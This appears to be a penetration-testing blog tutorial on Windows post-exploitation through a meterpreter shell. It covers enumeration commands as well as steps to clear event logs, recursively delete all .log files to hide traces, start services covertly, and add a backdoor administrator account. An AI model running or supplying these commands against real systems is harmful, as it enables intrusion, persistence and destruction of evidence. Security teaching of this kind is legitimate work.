This article is about
Post Exploitation on the Victim’s System using the Windows Command Line. When
an Attacker gains a meterpreter session on a Remote PC, then he/she can
enumerate a huge amount of information and make effective changes using the
knowledge of the Windows Command Line.
Requirement
Attacker: Kali
Linux
TarObtain: Window
PC
To execute this, we
will first Obtain the meterpreter session of the Remote PC which you can learn
from here. After
gaining the session, escalate its privileged to Administrator which you can
learn from here.
Now to access windows
command line, type ‘shell’ in the
meterpreter shell.
Let’s Start!!
Obtain
User Details and its Privileges
After gaining the
meterpreter shell or windows command line, before doing any work. It is
important to know the current user. This command is usually used to verify that
the account that we were trying to access is the one we got. This can be simply
done using the command whoami.
To increase our reach,
we will an option in “whoami” command:
[/all]: To show all the
details about the user.
Example: whoami /all
As seen below we have
username, SID and local group details
We also Obtain details about the privileges that are
enabled or disabled to the user we are currently logged on.
Obtain
the System Info
This command helps us enumerate lots of information
regarding the system like hostname, domain, time zone and much more.
Example: systeminfo
We can sort
the basic system details such as (Manufacturer, Build, and Model) of the
victim’s System using findstr.
Example: systeminfo | findstr System
As shown in the below
screenshot we have the Boot Time, Manufacturer, Model, Type, Directory and
Language of the Victim’s System.
We can Obtain
the location (as close as the country) of victim’s System using systeminfo.
Here we
are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Time
As shown in the below
screenshot we have the Time Zone (UTC+05:30), so we can say that the victim’s
System is in “INDIA”.
Obtain
Memory Details (Physical, Virtual, In Use, Free)
We can Obtain the
basic memory details of the victim’s System using systeminfo.
Here we are using
findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Memory
As shown in the below
screenshot we have the Total Physical Memory 3.5 GB out of which 1.6 GB
is available, we are also Obtainting Virtual Memory Details.
Obtain
the List System Drivers
We can display
a list of all installed device drivers on the
victim’s system and their properties through the
command called driverquery.
Example: driverquery
We can the list of Kernel Drivers on
the victim’s System using driverquery.
Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery
| findstr Kernel
As seen below we have obtained a list of kernel
drivers which can be used to get the direct exploits to the Victim’s System.
Obtain
the List of File System Drivers
We can
the list of File System Drivers on the victim’s System using driverquery.
Here we
are using findstr with driverquery
to filter the driverquery results.
Example: driverquery | findstr “File System”
Display
Info about a Particular Service
We can obtain
information about a particular service using sc command. Here we are using following options with sc command:
[query] to Obtain the names of a service.
Syntax: sc query [service name]
Example: sc query wuauserv
We
can obtain information about running tasks using tasklist command.
This
command shows the name of the task running along with the Process ID (PID),
Session Name, Session Number and Memory Usage.
Syntax: tasklist
[/m]: To specify the Modules in Tasklist
But we will have to mention the module which is
to be used to sort the Tasklist.
Syntax: tasklist /m [Module Name]
Example: tasklist /m ntdll.dll
Here we can see all the tasks linked with
ntdll.dll module.
Killing
Tasks
We can kill
tasks on the Victim’s System using a command called taskkill.
Taskkill
requires either one of two things:
1. Process Id
2. Task Name
Here we are
going to use [/f] option in taskkill, it enables the Taskkill to forcefully
kill the tasks.
Killing the Tasks using the Process ID
Syntax: taskkill /f /pid [Process id of Task]
Example: taskkill f /pid 7236
Killing the Tasks using the Task Name
Syntax: taskkill /f /im “[Task Name]”
Example: taskkill /f /im “Taskmgr.exe”
Start or
Stopping Services
We can
start a service or some backdoor without the knowledge of the Victim using sc command.
Here we
are using following options with sc
command:
[start] to start a service.
Syntax:sc start [Service Name]
Example: sc start TeamViewer
As you can see in the
below image the service has started.
We can also
stop a service using sc command.Here
we are using following options with sc command:
[stop] to start a service.
Syntax:sc stop [Service Name]
Example: sc stop TeamViewer
As you can see in the
below image the process Stopped
List all
the logs on the System
We can obtain a list
of all the logs on a system using wevtutil
command. Here we are using following options with wevtutil command:
[el] to List log names.
Example: wevtutil el
Clear a
specific logon the System
We can
clear a specific log on a system using wevtutil
command. Here we are using following options with wevtutil command:
[cl] to List log names.
Syntax: wevtutil cl [log name]
Example: wevtutil cl System
Find all
the Hard Disk/Storage Partitions on a System
While
penetration testing a Remote PC, knowledge of all the Hard Disk or Storage
Devices and Partitions is essential so that we can sweep all the partitions and
Storage Devices in hope to find data of any particular importance.
This can
be done using fsutil command. Here
we are using following options with fsutil
command:
[fsinfo] to view file system
info.
[drives] to list all drives.
Example: fsutil fsinfo drives
As you can see below
that the Victim System has 4 Hard Disk
Partitions C, D, E and F
Delete
all logs on a System
While
penetration testing a remote pc, it is essential to remove the trace of youractivities, so we need to remove the
evidence of our presence which can be found in log files.
The
entire Log file has a .log extension so we are going to sweep the System Directory for files with extension .log and delete
them with del command.
Note: Use this command with the path set to System
Directory (In my case it is C:\)
Here we
are using following options with del
command:
[/a] to select files based on attributes.
[/s] to select System Files (/s is an attribute so
it is to be used after /a)
[/q] to use Quiet Mode (It doesn’t ask if Ok to
delete on global wildcards)
[/f] to force delete the read only files
Syntax:del [Directory]\*.log /a /s /q /f
Example: del \*.log /a /s /q /f
As you can see in the below
screenshot the process of detecting and deleting the files with .log extension
has started.
While penetration testing a remote
PC, it is important to obtain the list of Local Users so that attacker can gain
infomation about the various users assigned to that particular system.
This can be done using net command. Here we are using
following options to be used with net command:
[-user]
to display the list of local users
Example: net
user
It is always advantageous to add a
user in the Local Groups so that attacker can perform certain tasks on that
system.
This can be done using net command. Here we are using
following options with net command:
Syntax:net
user [logon_name] [password] /add
Example: net
user hacker pass123 /add
Many times, we come across a
situation where we will have to perform certain administrative tasks, so we
will add the user we created to the Administrative local group
Here we are using following options to
be used with net command:
[-localgroup]
to select the list of local groups
Syntax: net localgroup
administrators [logon_name] /add
Example: net
localgroup administrators hacker/add
In the above example, I have added a user in the local
administrators group named as hacker.
We can verify using the “net user” command
Now, during
the clean-up process it is important to delete the local user created.
This can be done using net commandHere we are using following
options with net command:
Syntax: net
user [logon_name] /del
Example: net
user hacker /del
Here you can see that I have used
net command to add a user, making it a member of administrator local group and then
deleting that user.
Display
the List of all Scheduled Tasks
While penetration
testing a remote PC, it is necessary to know the scheduled tasks to plan the
attacks accordingly to further penetrate the Victim’s System. This can be done
using schtasks.
Here we are using following options with schtasks command:
[/query]to display all
scheduled tasks
[/fo] to specify
the format of the Output (In this case we use List)
[/v] to use
verbose mode
Example: schtasks /query /fo LIST /v
0 comments:
Post a Comment